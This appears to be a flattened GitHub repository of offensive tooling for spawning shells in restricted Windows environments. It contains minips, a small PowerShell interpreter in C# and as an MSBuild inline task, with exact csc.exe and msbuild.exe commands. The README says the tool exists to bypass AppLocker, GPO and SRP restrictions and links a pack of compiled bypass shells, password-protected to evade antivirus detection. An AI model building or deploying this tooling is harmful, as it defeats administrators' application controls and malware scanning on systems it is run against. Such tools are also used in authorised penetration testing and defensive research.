├── LICENSE ├── README.md ├── minips ├── minips.cs └── minips.xml └── shell-pack.zip /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 InfosecMatter 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Shells for restricted environments 2 | 3 | https://www.infosecmatter.com/19-ways-to-bypass-software-restrictions-and-spawn-a-shell/ 4 | 5 | ## Minips 6 | 7 | Minips is a custom minimalist PowerShell interpreter for bypassing AppLocker, GPO or SRP restrictions that prevent powershell.exe from running. 
Both versions run `Set-ExecutionPolicy Unrestricted -Scope CurrentUser` before every command, a per-user setting that persists after the shell exits. There are 2 identical versions available: 8 | 9 | ### minips.cs 10 | 11 | Compile with csc.exe like this: 12 | ``` 13 | # Go to the latest .NET version folder, e.g.: 14 | cd C:\Windows\Microsoft.NET\Framework64\v4.0.30319 15 | 16 | # Compile: 17 | csc.exe /unsafe /reference:"C:\path\to\System.Management.Automation.dll" /out:C:\users\public\minips.exe /platform:x64 "C:\path\to\minips.cs" 18 | ``` 19 | Then run the produced minips.exe executable to spawn the shell. 20 | 21 | ### minips.xml 22 | 23 | Simply start with msbuild.exe like this: 24 | ``` 25 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe c:\path\to\minips.xml 26 | ``` 27 | 28 | ## shell-pack.zip 29 | 30 | Contains compiled, ready-to-use shells for bypassing AppLocker, GPO or SRP restrictions that prevent the Command Prompt (cmd.exe) or the PowerShell interpreter (powershell.exe) from running. 31 | 32 | The pack contains the following shells: 33 | * [cmd-dll](https://blog.didierstevens.com/2010/02/04/cmd-dll/) 34 | * [CScriptShell](https://github.com/carnal0wnage/CScriptShell) 35 | * Minips 36 | * [MSBuildShell](https://github.com/Cn33liz/MSBuildShell) 37 | * [NoPowerShell](https://github.com/bitsadmin/nopowershell) 38 | * [nps](https://github.com/Ben0xA/nps) 39 | * [p0wnedshell](https://github.com/Cn33liz/p0wnedShell) 40 | * [PowerLine](https://github.com/fullmetalcache/PowerLine) 41 | * [PowerOPS](https://github.com/fdiskyou/PowerOPS) 42 | * [PowerShdll](https://github.com/p3nt4/PowerShdll) 43 | * [PSShell](https://github.com/fdiskyou/PSShell) 44 | * [SharpPick](https://github.com/TheKevinWang/SharpPick) 45 | 46 | The archive is password-protected in order to evade antivirus detection. 47 | 48 | More information, including the password, can be found [here](https://www.infosecmatter.com/19-ways-to-bypass-software-restrictions-and-spawn-a-shell/#bonus). 
49 | -------------------------------------------------------------------------------- /minips/minips.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.IO; 3 | using System.Collections.ObjectModel; 4 | using System.Management.Automation; 5 | using System.Management.Automation.Runspaces; 6 | using System.Text.RegularExpressions; 7 | using System.Text; 8 | 9 | public class ClassExample { 10 | static int Main(string[] args) { 11 | while(true) { 12 | Console.Write("PS> "); 13 | string x = Console.ReadLine(); 14 | try { 15 | Console.WriteLine(pscmd(x)); 16 | } 17 | catch (Exception e) { 18 | Console.WriteLine(e.Message); 19 | } 20 | if (x=="exit") { 21 | return(0); 22 | } else if (x.IndexOf("cd ", StringComparison.OrdinalIgnoreCase) >= 0) { 23 | string dir = x.Substring(x.IndexOf("cd ", StringComparison.OrdinalIgnoreCase)+3); 24 | dir = dir.Replace("\"", string.Empty).Trim(); 25 | try { 26 | Directory.SetCurrentDirectory(dir); 27 | } 28 | catch (Exception e) { 29 | Console.WriteLine( "The specified directory does not exist. 
{0}", e ); 30 | } 31 | } 32 | } 33 | } 34 | public static string pscmd(string cmd) { 35 | Runspace r = RunspaceFactory.CreateRunspace(); 36 | r.Open(); 37 | RunspaceInvoke s = new RunspaceInvoke(r); 38 | s.Invoke("Set-ExecutionPolicy Unrestricted -Scope CurrentUser"); 39 | Pipeline p = r.CreatePipeline(); 40 | p.Commands.AddScript(cmd); 41 | p.Commands.Add("Out-String"); 42 | Collection results = p.Invoke(); 43 | r.Close(); 44 | StringBuilder sb = new StringBuilder(); 45 | foreach (PSObject obj in results) { 46 | sb.Append(obj); 47 | } 48 | return sb.ToString().Trim(); 49 | } 50 | public static void RunPSFile(string script) { 51 | PowerShell ps = PowerShell.Create(); 52 | ps.AddScript(script).Invoke(); 53 | } 54 | } 55 | -------------------------------------------------------------------------------- /minips/minips.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 12 | 13 | 14 | 15 | "); 30 | string x = Console.ReadLine(); 31 | try { 32 | Console.WriteLine(pscmd(x)); 33 | } 34 | catch (Exception e) { 35 | Console.WriteLine(e.Message); 36 | } 37 | if (x=="exit") { 38 | return true; 39 | } else if (x.IndexOf("cd ", StringComparison.OrdinalIgnoreCase) >= 0) { 40 | string dir = x.Substring(x.IndexOf("cd ", StringComparison.OrdinalIgnoreCase)+3); 41 | dir = dir.Replace("\"", string.Empty).Trim(); 42 | try { 43 | Directory.SetCurrentDirectory(dir); 44 | } 45 | catch (Exception e) { 46 | Console.WriteLine( "The specified directory does not exist. 
{0}", e ); 47 | } 48 | } 49 | } 50 | } 51 | public static string pscmd(string cmd) { 52 | Runspace r = RunspaceFactory.CreateRunspace(); 53 | r.Open(); 54 | RunspaceInvoke s = new RunspaceInvoke(r); 55 | s.Invoke("Set-ExecutionPolicy Unrestricted -Scope CurrentUser"); 56 | Pipeline p = r.CreatePipeline(); 57 | p.Commands.AddScript(cmd); 58 | p.Commands.Add("Out-String"); 59 | Collection results = p.Invoke(); 60 | r.Close(); 61 | StringBuilder sb = new StringBuilder(); 62 | foreach (PSObject obj in results) { 63 | sb.Append(obj); 64 | } 65 | return sb.ToString().Trim(); 66 | } 67 | public static void RunPSFile(string script) { 68 | PowerShell ps = PowerShell.Create(); 69 | ps.AddScript(script).Invoke(); 70 | } 71 | } 72 | ]]> 73 | 74 | 75 | 76 | -------------------------------------------------------------------------------- /shell-pack.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/InfosecMatter/Shells-for-restricted-environments/2110dcf3ad266e5acdfe5596ece5e3ef048da2c1/shell-pack.zip --------------------------------------------------------------------------------